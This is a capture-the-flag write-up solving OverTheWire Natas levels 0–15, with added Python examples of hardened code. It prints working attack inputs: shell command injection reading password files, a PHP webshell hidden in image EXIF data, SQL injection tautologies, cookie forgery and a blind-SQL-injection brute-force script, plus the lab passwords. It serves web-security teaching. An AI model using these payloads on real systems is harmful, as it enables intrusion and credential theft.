Solutions of NATAS 1-15

Hello Folks,

In this post, I will share my solutions to the Natas challenges from one to fifteen. It is strongly recommended that you think each level through yourself before looking at the solutions.

Natas0:

Username and password have been already provided for Natas0.

URL: http://natas0.natas.labs.overthewire.org

natas0/natas0

Solution:

Log in to the page with the credentials natas0/natas0.

In Chrome, right-click and choose “View page source”.

Password for natas1 is: gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1:

URL: http://natas1.natas.labs.overthewire.org/

Solution:

Log in to the page with the credentials you got from natas0.

In this challenge right-clicking is disabled, so use the F12 shortcut key to open the Web Developer Tools and then select the Elements tab.

Password for natas2 is: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Natas2:

URL: http://natas2.natas.labs.overthewire.org

Solution:

Log in to the page with the credentials you got from natas1.

In Chrome, right-click and choose “View page source”.

It is not obvious, but the tag <img src="files/pixel.png"> gives us a hint: there is a files/ directory.

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Let’s make a request for the URL http://natas2.natas.labs.overthewire.org/files/

The directory listing shows the file users.txt, which holds several users’ credentials.

Password for natas3 is: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3:

URL: http://natas3.natas.labs.overthewire.org

For this challenge, we should have a basic understanding of robots.txt, the Robots Exclusion Protocol file that tells user agents (web crawlers) which parts of a website they may or may not crawl. These crawl instructions are given by “disallowing” or “allowing” paths for certain (or all) user agents.

Solution:

Log in to the page with the credentials you got from natas2 and “View Page Source” in Google Chrome.

Let’s make a request to the URL http://natas3.natas.labs.overthewire.org/robots.txt

As described in the introduction, this file tells all user agents (all crawlers) not to access or index the contents of the folder s3cr3t. Since robots.txt is public, listing a directory there only advertises it and does not restrict access: requesting the URL http://natas3.natas.labs.overthewire.org/s3cr3t/ shows users.txt.

Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4:

URL: http://natas4.natas.labs.overthewire.org

To solve this challenge you need a basic understanding of the common HTTP request headers. The one that matters here is the Referer header.

Solution:

Referer is an HTTP header field that identifies the address of the web page (i.e. the URI or IRI) that linked to the resource being requested. By checking the referrer, the new web page can see where the request originated. (Wikipedia) Because the client sets this header, a server that grants access based on Referer is trusting a value the client can set to anything, which is exactly what the request below does.

curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/"  -u  natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

Password for natas5 is: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5:

URL: http://natas5.natas.labs.overthewire.org

When we send a web request to the web server via curl, the server answers with a Set-Cookie header. With every later request, the user agent sends all previously stored cookies back to the server in the Cookie: header.

curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
< 

Solution:

There is no clear answer to this challenge. I just guessed it and modified the cookie by setting Cookie: loggedin=1

curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
< 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact

Password for natas6 is: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6:

URL: http://natas6.natas.labs.overthewire.org

When we check the source code, it compares the value of $secret with the value of the input element. If both values are equal, the password for natas7 is printed.

<?php

// The secret lives in a file under the web root, so it can also be fetched directly
include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Solution: 

The include statement includes and evaluates the specified file (PHP Manual). Let’s try to access the includes/secret.inc file directly by making a web request to the URL http://natas6.natas.labs.overthewire.org/includes/secret.inc

As you can see, the value of the $secret variable is FOEIUWGHFEEUHOFUOIU. Put this value into the input form and submit it.

Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7:

URL: http://natas7.natas.labs.overthewire.org

Solution:

Pages are rendered according to the value of $_REQUEST['page']. For example, http://natas7.natas.labs.overthewire.org/index.php?page=about renders the about page.

What if we set the page value to /etc/natas_webpass/natas8? Our URL becomes http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8:

URL: http://natas8.natas.labs.overthewire.org

We need to do some simple reverse engineering to solve this challenge. The key is the function encodeSecret().

We must put a value into the input form for which that function yields 3d3d516343746d4d6d6c315669563362.

Solution:

You can use the URL https://repl.it/repls/SoftElegantPublishers as a PHP sandbox.

<?php

// encodeSecret() applies base64_encode, strrev and bin2hex in that order,
// so undoing it means applying the inverses in reverse order.
echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));

//oubWYf2kBq
?>

If you put the value oubWYf2kBq into the secret input, you will get the password for natas9.

Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9:

URL: http://natas9.natas.labs.overthewire.org

Solution:

Several shell commands can be run from one input by separating them with a semicolon (;).

ls;cat /etc/natas_webpass/natas10

Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10:

URL: http://natas10.natas.labs.overthewire.org

Output:

<?php
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    // Deny-list: only ; | and & are rejected; other shell metacharacters pass
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        // $key is still interpolated into a shell command line
        passthru("grep -i $key dictionary.txt");
    }
}
?>

Solution: 

If you check the snippet of code above, some special characters are checked by the preg_match() PHP function. We need to get past this check somehow.

Solution 1: .* cat /etc/natas_webpass/natas11

Solution 2: Use URL encoding (%0A is a newline) to get past the preg_match() filter, which only rejects ; | and &.

http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
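The two inputs above both pass the page's deny-list. As an added Python example (not the Natas source or the write-up's code), the check below mirrors preg_match('/[;|&]/') and puts an allow-list beside it, runs both over the write-up's inputs and a benign word, and does the dictionary search in-process rather than through a shell, so the needle is never command-line text. DICTIONARY, PAGE_INPUTS and the function names are constructed for this example.

```python
import re

# The page's PHP check, mirrored: a deny-list that rejects only ; | and &
DENY_LIST = re.compile(r"[;|&]")
# Hardened alternative (assumption, not the Natas source): accept a single
# alphanumeric token and nothing else. fullmatch() is used on purpose; a PHP
# port would need \z or the D modifier, because PCRE's $ also matches just
# before a trailing newline and would let "pass\n..." through.
ALLOW_LIST = re.compile(r"[A-Za-z0-9]+")

# Constructed stand-in for dictionary.txt so the example runs offline.
DICTIONARY = ["password", "passwd", "Passover", "apple", "zebra"]

# Inputs from the write-up: the two filter bypasses and one benign search.
PAGE_INPUTS = {
    "benign": "pass",
    "solution1": ".* cat /etc/natas_webpass/natas11",
    "solution2": "pass\n cat /etc/natas_webpass/natas11",   # %0A decoded
}


def deny_list_accepts(needle):
    """True if the page's preg_match('/[;|&]/') check would let the input through."""
    return DENY_LIST.search(needle) is None


def allow_list_accepts(needle):
    """True only for a single alphanumeric token."""
    return ALLOW_LIST.fullmatch(needle) is not None


def search_dictionary(needle, words=DICTIONARY):
    """Case-insensitive substring search done in Python instead of
    passthru("grep -i $key dictionary.txt"): no shell ever sees the needle,
    and the allow-list is still enforced as defence in depth."""
    if not allow_list_accepts(needle):
        raise ValueError("needle must be a single alphanumeric token")
    n = needle.lower()
    return [w for w in words if n in w.lower()]


def audit():
    """For each page input: (deny-list verdict, allow-list verdict)."""
    return {name: (deny_list_accepts(v), allow_list_accepts(v))
            for name, v in PAGE_INPUTS.items()}


if __name__ == "__main__":
    for name, (deny_ok, allow_ok) in audit().items():
        print(f"{name:10s} deny-list passes={deny_ok!s:5} allow-list passes={allow_ok}")
    print(search_dictionary("pass"))
```

Running it shows the deny-list accepting all three inputs while the allow-list accepts only the benign one; the point is that a deny-list has to enumerate every character the shell cares about, whereas an allow-list plus no shell at all removes the question.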

Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas11:

URL: http://natas11.natas.labs.overthewire.org/

<?php

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character: repeating-key XOR, so the same
    // function both encrypts and decrypts
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        // The cookie is decoded and trusted; nothing checks that the server produced it
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>

Solution: Logic of XOR Encryption

If you compare the source code with the server response, you realize that you know both the ciphertext (the cookie) and the plaintext (the JSON of $defaultdata), so we can recover the xor_encrypt key for this challenge.

Plain Text  XOR Key = Cipher Text

Cipher Text XOR Plain Text = Key

tesla@otuken:~$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8

The ciphertext is: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw

<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>

Result:

{"showpassword":"no","bgcolor":"#ffffff"}

Let’s XOR the decoded ciphertext with {"showpassword":"no","bgcolor":"#ffffff"} to recover the key.

Key is: qw8J

Encrypted cookie for showing password is:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org

Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
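The known-plaintext recovery described above, written out as an added Python example that is not part of the write-up or of Natas. It uses the two cookie values and the default data from this section; xor_bytes, php_json, shortest_period and the seal/unseal pair that implements an HMAC-tagged cookie as the hardened alternative are this example's own assumptions. The same lesson applies to natas5: state the client can edit (loggedin=0, or an XOR-scrambled JSON blob) is not authentication unless the server can verify it came from the server.

```python
import base64
import hashlib
import hmac
import json

# Values taken from the write-up above.
DEFAULT_COOKIE = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="
FORGED_COOKIE = "ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK"
DEFAULT_DATA = {"showpassword": "no", "bgcolor": "#ffffff"}


def xor_bytes(data, key):
    """Same operation as the page's xor_encrypt(): repeating-key XOR."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def php_json(obj):
    """PHP's json_encode() emits no spaces; Python must be told to match it."""
    return json.dumps(obj, separators=(",", ":")).encode()


def shortest_period(stream):
    """Smallest repeating unit of a key stream obtained as cipher XOR plaintext."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % p] for i in range(len(stream))):
            return stream[:p]
    return stream


def recover_key(cookie_b64, plaintext):
    """The write-up's relation: Cipher Text XOR Plain Text = Key."""
    return shortest_period(xor_bytes(base64.b64decode(cookie_b64), plaintext))


def encrypt_cookie(data, key):
    """What saveData() does: base64(xor(json))."""
    return base64.b64encode(xor_bytes(php_json(data), key)).decode()


# --- Hardened alternative (assumption; not the Natas source) -----------------
# Whatever is in the cookie, the server only accepts it if the HMAC tag, made
# with a secret that never leaves the server, matches. Knowing the plaintext
# then gives an attacker nothing, because there is no key to recover.
SERVER_SECRET = b"constructed-server-side-secret"


def seal(data, secret=SERVER_SECRET):
    body = base64.b64encode(php_json(data))
    tag = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
    return (body + b"." + tag).decode()


def unseal(cookie, secret=SERVER_SECRET):
    body, _, tag = cookie.encode().rpartition(b".")
    expected = hmac.new(secret, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        return None   # tampered or forged: caller falls back to defaults
    return json.loads(base64.b64decode(body))


def demo_tamper():
    """Client keeps the server's tag but swaps the body: unseal() must reject it."""
    good = seal(DEFAULT_DATA)
    tag = good.rsplit(".", 1)[1]
    edited = {"showpassword": "yes", "bgcolor": "#ffffff"}
    body = base64.b64encode(php_json(edited)).decode()
    return unseal(body + "." + tag) is None


if __name__ == "__main__":
    key = recover_key(DEFAULT_COOKIE, php_json(DEFAULT_DATA))
    print("recovered key:", key)
    print("re-encrypting the default data gives the original cookie:",
          encrypt_cookie(DEFAULT_DATA, key) == DEFAULT_COOKIE)
    print("HMAC cookie rejects an edited body:", demo_tamper())
```

recover_key() returns qw8J, and re-encrypting the default data with it reproduces the cookie the server sent, which is the check that the recovery is right; shortest_period() is what turns the 41-byte key stream into the four-byte key. The sealed variant deliberately does not encrypt at all: for a flag like showpassword the property that matters is integrity, not confidentiality.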

Natas12:

URL: http://natas12.natas.labs.overthewire.org/

1- Install exiftool.

2- Create a very small JPEG image (less than 1 KiB) and name it white.jpg (a small white background is enough).

3- Inject the PHP code into white.jpg’s metadata with exiftool:

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg

tesla@otuken:~/Downloads$ exiftool white.jpg
ExifTool Version Number         : 10.80
File Name                       : white.jpg
Directory                       : .
File Size                       : 917 bytes
File Modification Date/Time     : 2018:11:27 22:11:00+04:00
File Access Date/Time           : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time     : 2018:11:27 22:11:00+04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Document Name                   : <?php system('cat /etc/natas_webpass/natas13'); ?>
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 51
Image Height                    : 51
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 51x51
Megapixels                      : 0.003

4- Open the browser and request http://natas12.natas.labs.overthewire.org/

5- Open the browser’s Developer Tools and remove the type="hidden" attribute from the filename field.

6- Change the file suffix from jpg to php.

7- Click the link of the uploaded file; it will be interpreted by PHP.

Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
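Steps 5 and 6 work because the server takes the stored extension from a form field the browser can edit. As an added Python example (my own, not Natas code), the handler below chooses the extension from the file's magic bytes, picks a random basename, ignores the client-supplied name entirely, and flags an image whose bytes contain a PHP open tag so it can be logged. SIGNATURES, the sample byte strings and the function names are constructed for this example. Sniffing alone does not make embedded PHP text harmless, as the write-up's EXIF trick shows; the other half of the control is an upload directory the web server never executes scripts from.

```python
import secrets

# Magic-byte allow-list (constructed for this example). The stored extension is
# derived from these bytes, never from the client filename or a hidden field.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Constructed sample: a JPEG header followed by a PHP tag inside its metadata,
# the shape of file the write-up builds with exiftool -documentname.
SAMPLE_JPEG_WITH_PHP = (b"\xff\xd8\xff\xe1\x00\x30Exif\x00\x00"
                        + b"<?php echo 'constructed payload'; ?>"
                        + b"\xff\xd9")
SAMPLE_CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\xff\xd9"
SAMPLE_PLAIN_PHP = b"<?php echo 'constructed'; ?>"


def sniff_extension(data):
    """Extension chosen by content, or None when the bytes match no allowed image."""
    for magic, ext in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def contains_php_tag(data):
    """Detection signal for logging or alerting: image bytes that carry a PHP
    open tag. A genuine image has no reason to contain one, even in EXIF text."""
    lowered = data.lower()
    return b"<?php" in lowered or b"<?=" in lowered


def safe_upload_name(client_filename, data):
    """Server-chosen storage name: random basename plus sniffed extension.
    client_filename is accepted only so the signature mirrors a real handler;
    it is deliberately never used."""
    ext = sniff_extension(data)
    if ext is None:
        raise ValueError("upload rejected: not an allowed image type")
    return f"{secrets.token_hex(8)}.{ext}"


def is_rejected(client_filename, data):
    """True when safe_upload_name() refuses the bytes."""
    try:
        safe_upload_name(client_filename, data)
    except ValueError:
        return True
    return False


def handle_upload(client_filename, data):
    """What an upload handler would record: the stored name and the PHP flag."""
    return {
        "stored_as": safe_upload_name(client_filename, data),
        "flag_php_in_image": contains_php_tag(data),
    }


if __name__ == "__main__":
    # The browser asks for "white.php"; the server still stores a .jpg
    print(handle_upload("white.php", SAMPLE_JPEG_WITH_PHP))
    print("plain PHP rejected:", is_rejected("white.php", SAMPLE_PLAIN_PHP))
```

The flag does not change what is stored; it exists so that a file like the one in step 3 shows up in logs even though it passed the image check.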

Natas13: 

URL: http://natas13.natas.labs.overthewire.org

You can use the same method as on natas12. The only thing you have to change is the file to be read:

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas14'); ?>" white.jpg

Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas14:

URL: http://natas14.natas.labs.overthewire.org

<?php
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    // Both request values are concatenated straight into the SQL string
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
        echo "Successful login! The password for natas15 is <censored><br>";
    } else {
        echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

Solution:

username > " or "1"="1

password > " or "1"="1

Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas15:

<?php

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);

    // username is concatenated into the query; only a yes/no result is shown
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
        if(mysql_num_rows($res) > 0) {
            echo "This user exists.<br>";
        } else {
            echo "This user doesn't exist.<br>";
        }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

//omitted...

Solution:

My first guess for solving this challenge was the INTO OUTFILE statement. Unluckily, I do not have permission to create a file. For more information, check the secure_file_priv option of the MySQL server.

Example:

select * from users where username="natas16" into outfile "/var/www/html"

After three days of trying other methods, I was stuck on this challenge, so I had to get a hint. The hint was “Blind SQL Injection”. After reading some blog pages, I understood the logic and created my own solution to find the password. Basically, the script brute-forces by trying all letters (uppercase and lowercase) and digits.

#!/bin/bash
# Blind SQL injection brute-force for natas15: the page only answers whether a
# user exists, so each request asks "does natas16's password start with
# <known prefix><candidate letter>?" and a positive answer extends the prefix.

# Candidate alphabet: a-z, A-Z, 0-9
letters=""
for i in {a..z} {A..Z} {0..9}; do
    letters+=$i
done
echo "$letters"
echo ""

key=""

# Natas passwords are 32 characters; 40 rounds leaves some margin.
for count in {1..40}; do
    for (( i=0; i<${#letters}; i++ )); do
        letter="${letters:$i:1}"
        # "like binary" keeps the comparison case-sensitive; the trailing % is the LIKE wildcard.
        # -s silences curl's progress output; grep -q only sets the exit status.
        if curl -s -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J \
            "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" \
            | grep -q "This user exists"; then
            key+=$letter
        fi
    done
done
echo "key is: $key"

Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
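natas14 and natas15 fail for the same reason: request values are pasted into the SQL text, so the tautology login and the blind "does the password start with ..." probe both change the shape of the query. As an added Python example (not the Natas source), the functions below put the concatenated form beside a parameterized one and run the write-up's inputs through both against an in-memory sqlite3 table. Single quotes replace the page's double quotes because sqlite3 reads "..." as identifiers, SQLite's LIKE is already case-insensitive so the `binary` keyword is dropped, and the table contents, SAMPLE_PASSWORD and all function names are constructed for this example.

```python
import sqlite3

# Constructed stand-in for the natas users table; the password is made up.
SAMPLE_PASSWORD = "constructed-example-password"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username VARCHAR(64), password VARCHAR(64))")
    con.execute("INSERT INTO users VALUES (?, ?)", ("natas16", SAMPLE_PASSWORD))
    return con


def login_concat(con, username, password):
    """natas14's pattern: request values pasted straight into the SQL text."""
    query = ("SELECT * FROM users WHERE username='" + username
             + "' AND password='" + password + "'")
    return len(con.execute(query).fetchall()) > 0


def login_param(con, username, password):
    """Hardened form: placeholders, so input is data and cannot alter the query."""
    rows = con.execute("SELECT * FROM users WHERE username=? AND password=?",
                       (username, password)).fetchall()
    return len(rows) > 0


def user_exists_concat(con, username):
    """natas15's pattern: only a yes/no answer, but the WHERE clause is still
    written by whoever controls the username."""
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return len(con.execute(query).fetchall()) > 0


def user_exists_param(con, username):
    rows = con.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()
    return len(rows) > 0


# The page's inputs, single-quoted for sqlite3.
TAUTOLOGY = "' or '1'='1"
# One probe of the write-up's loop: "does the password start with c?"
BLIND_PROBE_HIT = "natas16' and password like 'c%"
BLIND_PROBE_MISS = "natas16' and password like 'z%"


def compare():
    """Same inputs through both query styles; the dict is what to look at."""
    con = make_db()
    return {
        "concat_tautology_login": login_concat(con, TAUTOLOGY, TAUTOLOGY),
        "param_tautology_login": login_param(con, TAUTOLOGY, TAUTOLOGY),
        "param_real_login": login_param(con, "natas16", SAMPLE_PASSWORD),
        "concat_blind_hit": user_exists_concat(con, BLIND_PROBE_HIT),
        "concat_blind_miss": user_exists_concat(con, BLIND_PROBE_MISS),
        "param_blind_hit": user_exists_param(con, BLIND_PROBE_HIT),
    }


if __name__ == "__main__":
    for name, verdict in compare().items():
        print(f"{name:24s} {verdict}")
```

With concatenation the tautology logs in and the blind probe leaks one bit per request; with placeholders the same strings are just usernames that do not exist, while the real credentials still work. The `debug` parameter in the Natas source, which echoes the final query, is the kind of thing to strip from production code even after the query is parameterized.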